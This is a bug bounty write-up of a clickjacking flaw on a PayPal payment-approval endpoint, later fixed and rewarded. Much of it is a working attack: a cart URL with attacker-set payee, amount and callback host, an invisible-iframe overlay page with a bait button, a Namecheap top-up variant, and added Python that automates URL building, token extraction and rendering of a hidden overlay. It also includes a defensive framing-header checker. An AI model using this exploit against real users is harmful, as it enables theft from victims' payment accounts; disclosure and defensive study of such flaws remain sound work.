Vulnerability In PayPal worth 200000$ bounty, Attacker can Steal Your Balance by One-Click

h4x0r_dz
5 min read · May 22, 2022


What if I told you that a black hat hacker can steal your money from your bank account, credit card or PayPal balance with one click from you? It sounds interesting, doesn’t it? In this write-up, I will show you how I found a low-severity vulnerability in PayPal that is nonetheless impactful :).

Summary

7 months ago I reported a security issue to the PayPal bug bounty program where an attacker can steal users' money by exploiting clickjacking.

Clickjacking, also known as a “UI redress attack”, is when an attacker uses multiple transparent or opaque layers to trick a user into clicking on a button or link on another page when they were intending to click on the top-level page. Thus, the attacker is “hijacking” clicks meant for their page and routing them to another page, most likely owned by another application, domain, or both. (Reference: https://owasp.org/www-community/attacks/Clickjacking)

I found that an attacker can steal money from PayPal accounts. An old issue, clickjacking on https://www.paypal.com/agreements/approve, was closed as N/A years ago, and no one was able to successfully exploit it (I guess).

This endpoint is designed for billing agreements and should accept only a billingAgreementToken, but during my deep testing I found that other token types can be passed, and this leads to stealing money from the victim's PayPal account.

As you can see in the picture, the attacker is able to load a sensitive paypal.com endpoint in an iframe, and when the victim clicks next to “click here”, he buys something.

Of course, the victim must be logged in to PayPal in the browser; otherwise the framed page has no session to act on.
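Before building an overlay, the first thing to establish is whether the target response can be framed from a foreign origin at all. The following is an added example, not code from the post or from PayPal: it classifies a response's headers the way current browsers do (a CSP frame-ancestors directive is authoritative and X-Frame-Options is then ignored; DENY and SAMEORIGIN block; conflicting values are treated as deny; any other value is ignored and gives no protection) and shows the headers that close an endpoint to framing. Every header set in it is a constructed sample, and attacker.example is a placeholder origin.

```python
# Added example, not code from the original post: decide from a response's
# headers whether a page can be framed from a foreign origin. This is the
# check a tester runs before trying clickjacking against an endpoint, and
# HARDENED_HEADERS at the bottom is what a defender ships to close it.
import urllib.request
from typing import Dict, List, Optional, Tuple


def _get_header(headers: Dict[str, str], name: str) -> Optional[str]:
    """Case-insensitive header lookup (HTTP header names are case-insensitive)."""
    wanted = name.lower()
    for key, value in headers.items():
        if key.lower() == wanted:
            return value
    return None


def _frame_ancestors(csp: str) -> Optional[List[str]]:
    """Source list of the frame-ancestors directive, or None if the policy has none."""
    for directive in csp.split(";"):
        parts = directive.strip().split()
        if parts and parts[0].lower() == "frame-ancestors":
            return [p.lower() for p in parts[1:]]
    return None


def frameable_by(headers: Dict[str, str],
                 attacker_origin: str = "https://attacker.example") -> Tuple[bool, str]:
    """Return (True, why) if attacker_origin may frame this response, else (False, why).

    Simplification: frame-ancestors host sources are matched exactly against
    attacker_origin; wildcard host patterns (e.g. *.example.com) are not expanded.
    """
    csp = _get_header(headers, "Content-Security-Policy")
    if csp is not None:
        ancestors = _frame_ancestors(csp)
        if ancestors is not None:
            # CSP3: when frame-ancestors is present, X-Frame-Options is ignored.
            if "'none'" in ancestors:
                return False, "CSP frame-ancestors 'none'"
            if "*" in ancestors or "https:" in ancestors or attacker_origin.lower() in ancestors:
                return True, f"CSP frame-ancestors permits {attacker_origin}: {ancestors}"
            # 'self' or an allow-list that does not include the attacker's origin.
            return False, f"CSP frame-ancestors restricts framing to {ancestors}"

    xfo = _get_header(headers, "X-Frame-Options")
    if xfo is not None:
        values = {v.strip().lower() for v in xfo.split(",") if v.strip()}
        if len(values) > 1:
            return False, f"conflicting X-Frame-Options values {sorted(values)} are treated as deny"
        if values & {"deny", "sameorigin"}:
            return False, f"X-Frame-Options {xfo.strip().upper()}"
        # ALLOW-FROM, ALLOWALL and typos are ignored by current browsers: no protection.
        return True, f"X-Frame-Options value {xfo.strip()!r} is not recognised and is ignored"

    return True, "no frame-ancestors directive and no X-Frame-Options header"


# Defensive headers for an endpoint that must never be framed. Sending both
# also covers browsers that predate CSP frame-ancestors.
HARDENED_HEADERS = {
    "Content-Security-Policy": "frame-ancestors 'none'",
    "X-Frame-Options": "DENY",
}


def check_url(url: str, timeout: int = 15) -> Tuple[bool, str]:
    """Fetch url (redirects followed) and classify the final response. Needs network."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return frameable_by(dict(resp.headers.items()))


if __name__ == "__main__":
    # Constructed header sets, not captured from paypal.com.
    samples = {
        "no headers": {},
        "xfo deny": {"X-Frame-Options": "DENY"},
        "csp overrides xfo": {"X-Frame-Options": "DENY",
                              "Content-Security-Policy": "frame-ancestors *"},
        "hardened": HARDENED_HEADERS,
    }
    for name, hdrs in samples.items():
        print(f"{name:18} -> {frameable_by(hdrs)}")
```

Run `check_url("https://target.example/endpoint")` against a real endpoint; only a `(False, ...)` result means the framing route is closed, and a `(True, ...)` result with a "not recognised" reason is the common misconfiguration where a header is present but does nothing.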

Proof 0f C0ncept

"https://www.paypal.com/cgi-bin/webscr?address1=sectesting&address2=sectesting02&address_override=true&amount_1=1&business=<attacker@gmail.com>&cancel_return=https://xxxxxx.burpcollaborator.net/cancel_return&city=barika&cmd=_cart&country=DZ&currency_code=USD&email=<anything>@gmail.com&first_name=attacker&invoice=marketplace133703&item_name_1=attacker&item_number_1=133788802&last_name=attacker&notify_url=https://xxxxxx.burpcollaborator.net/notify_url&quantity_1=1&return=https://xxxxxx.burpcollaborator.net/return&state=05&upload=1&zip=1337"

  1. In the link above, change business to the attacker's PayPal email, return and notify_url to your host so that you receive the HTTP requests, and amount_1 to how much money you want to steal from the victim's account!

You can also change the first/last name and the address to your own info; when you do, this billing full name/address will be registered in the victim's account!

  2. Now send a GET request using curl and grep the token value.

  3. Upload this poc.html to your host and put your token in the ba_token parameter.

<!DOCTYPE html>
<html>
<head>
<title>POC</title>
</head>
<body>
<!-- Decoy content: what the victim believes the page is about -->
<center> <img src="https://i.ibb.co/bWqXsQT/Mnanauk-2020-Chef-Mnanauk.jpg"></center>
<style>
/* Full-screen iframe laid over the decoy. opacity: 1 keeps the PayPal page
   visible for the demo (the original 1.01 is clamped to 1 by browsers);
   set it to 0 in a real attack so the victim sees only the decoy. */
iframe {
width: 1920px;
height: 1080px;
position: absolute;
top:0; left:-20px;
opacity: 1;
z-index: 1;
}
</style>
<!-- The sensitive PayPal endpoint, loaded with the token obtained in step 2 -->
<iframe src="https://www.paypal.com/agreements/approve?nolegacy=1&ba_token=<TOKEN>"></iframe>
<!-- Bait button placed beside PayPal's confirmation button. It sits above the
     iframe (z-index 10 > 1), so a click on the button itself goes nowhere;
     the victim is lured into clicking next to it, and that click lands on
     the framed PayPal button. -->
<button style="position: fixed; display: inline; z-index: 10; left: 701px; top: 520px;">Click here to win 1337$ => </button>
</body>
</html>

Note: in a real attack the opacity should be 0; you can change it.

Now log in to your PayPal account in the browser and open the HTML page.
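Steps 1 to 3 above, automated as an added example that is not code from the post: one function fills the attacker-controlled fields of the cart URL, one pulls the token out of the response, and one renders the overlay page. Assumptions, all mine: the post only says to "grep the token", so extract_token looks for a `token=` or `ba_token=` query parameter in the redirect Location header or the body; the sample token BA-TESTTOKEN123, attacker@example.com and the collaborator hostname are constructed; and render_poc puts the lure beneath the iframe (lower z-index) so a click on the lure passes through to PayPal's button, which differs from the post's PoC where the button sits on top and the victim clicks beside it. The lure's left/top must still be tuned to where PayPal's confirmation button renders in the victim's viewport.

```python
# Added example, not code from the original post: steps 1-3 of the PoC as
# functions. The token location and the sample values are assumptions.
import re
import urllib.error
import urllib.request
from typing import Optional
from urllib.parse import urlencode

PAYPAL_WEBSCR = "https://www.paypal.com/cgi-bin/webscr"
PAYPAL_APPROVE = "https://www.paypal.com/agreements/approve"


def build_cart_url(business: str, amount: float, callback_host: str,
                   first_name: str = "attacker", last_name: str = "attacker") -> str:
    """Step 1: the cart URL from the post with the attacker-controlled fields filled in.

    business receives the payment; amount_1 is what the victim is charged;
    return/cancel_return/notify_url are where the victim's browser and PayPal's
    notification report back, so they point at a host the attacker controls.
    """
    params = {
        "cmd": "_cart", "upload": "1",
        "business": business,
        "item_name_1": "attacker", "item_number_1": "133788802",
        "amount_1": f"{amount:.2f}", "quantity_1": "1", "currency_code": "USD",
        "invoice": "marketplace133703",
        "email": "anything@gmail.com",
        # Billing identity that ends up registered in the victim's account.
        "first_name": first_name, "last_name": last_name,
        "address_override": "true", "address1": "sectesting", "address2": "sectesting02",
        "city": "barika", "state": "05", "zip": "1337", "country": "DZ",
        "return": f"https://{callback_host}/return",
        "cancel_return": f"https://{callback_host}/cancel_return",
        "notify_url": f"https://{callback_host}/notify_url",
    }
    return f"{PAYPAL_WEBSCR}?{urlencode(params)}"


# Assumption: the token surfaces as a token=/ba_token= query parameter.
TOKEN_RE = re.compile(r"(?:ba_)?token=([A-Za-z0-9_-]+)")


def extract_token(text: str) -> Optional[str]:
    """Step 2, the 'grep the token' part; None when no token is present."""
    match = TOKEN_RE.search(text)
    return match.group(1) if match else None


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Stop urllib from following 3xx so the Location header stays visible."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def fetch_token(cart_url: str, timeout: int = 15) -> Optional[str]:
    """Step 2 over the network: GET the cart URL once, search headers and body."""
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        resp = opener.open(cart_url, timeout=timeout)
    except urllib.error.HTTPError as err:  # an unfollowed 3xx is raised as HTTPError
        resp = err
    raw = "\n".join(f"{k}: {v}" for k, v in resp.headers.items())
    raw += "\n" + resp.read().decode("utf-8", "replace")
    return extract_token(raw)


def render_poc(token: str, visible: bool = True,
               lure_left: int = 701, lure_top: int = 520) -> str:
    """Step 3: the overlay page. visible=True keeps the iframe opaque for a demo;
    visible=False (opacity 0) is the real attack. The lure has the lower z-index,
    so the click on it is received by the transparent PayPal frame above it."""
    opacity = "1" if visible else "0"
    return f"""<!DOCTYPE html>
<html><head><title>POC</title></head>
<body>
<button style="position: fixed; z-index: 1; left: {lure_left}px; top: {lure_top}px;">Click here to win 1337$ =></button>
<iframe src="{PAYPAL_APPROVE}?nolegacy=1&ba_token={token}"
        style="width: 1920px; height: 1080px; position: absolute; top: 0; left: -20px; opacity: {opacity}; z-index: 10; border: 0;"></iframe>
</body></html>
"""


if __name__ == "__main__":
    url = build_cart_url("attacker@example.com", 1.00, "xxxxxx.burpcollaborator.net")
    print(url)
    # Constructed response fragment standing in for the real one (offline demo);
    # replace with fetch_token(url) to go over the network.
    token = extract_token("Location: https://www.paypal.com/agreements/approve?ba_token=BA-TESTTOKEN123")
    print(render_poc(token, visible=False))
```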

As you can see, I’m not the best designer; actually, I know nothing about CSS, but this PoC is enough, I think!

You should click where you should click, hahaha, and you will send money to the attacker's PayPal. Also, the attacker's address will be injected as the default billing address.

Here in Burp Collaborator we can see the full information of the victim's account when he clicks on the vulnerable page:

Also, another security issue: the attacker-injected billing address becomes the default one on the victim's PayPal account:

Steal money from user account, part 2

There are online services that let you add balance to your account using PayPal, for example Steam! I can use the same exploit and force the user to add money to my account!

Or I can exploit this bug and have the victim create/pay for a Netflix account for me!

But I used namecheap.com for this example.

Steps

1- Open https://ap.www.namecheap.com/Profile/Billing

2- Click Top-up.

3- Choose how much you want to steal from the victim's account!

4- Click "Check out with PayPal".

5- Now copy the token and add it to poc.html.

6- Open the HTML page.

7- Now when the victim clicks on “click here”, he pays using the payment method linked to his PayPal account.

At this point the victim has given Namecheap permission to take a certain amount from his PayPal account, which goes to the attacker's account on Namecheap.

8- As the attacker, open https://ap.www.namecheap.com/profile/billing/topup/paypal/submit?&token=<token> and you will be able to add the money to your Namecheap account.

Video PoC:

200k$ bounty rewarded!

Sorry for the clickbait, but this was HackerOne's triage response:

Update: 17/06/2022

The PayPal bug bounty team decided to accept the report and fix this issue, and awarded me $3200:
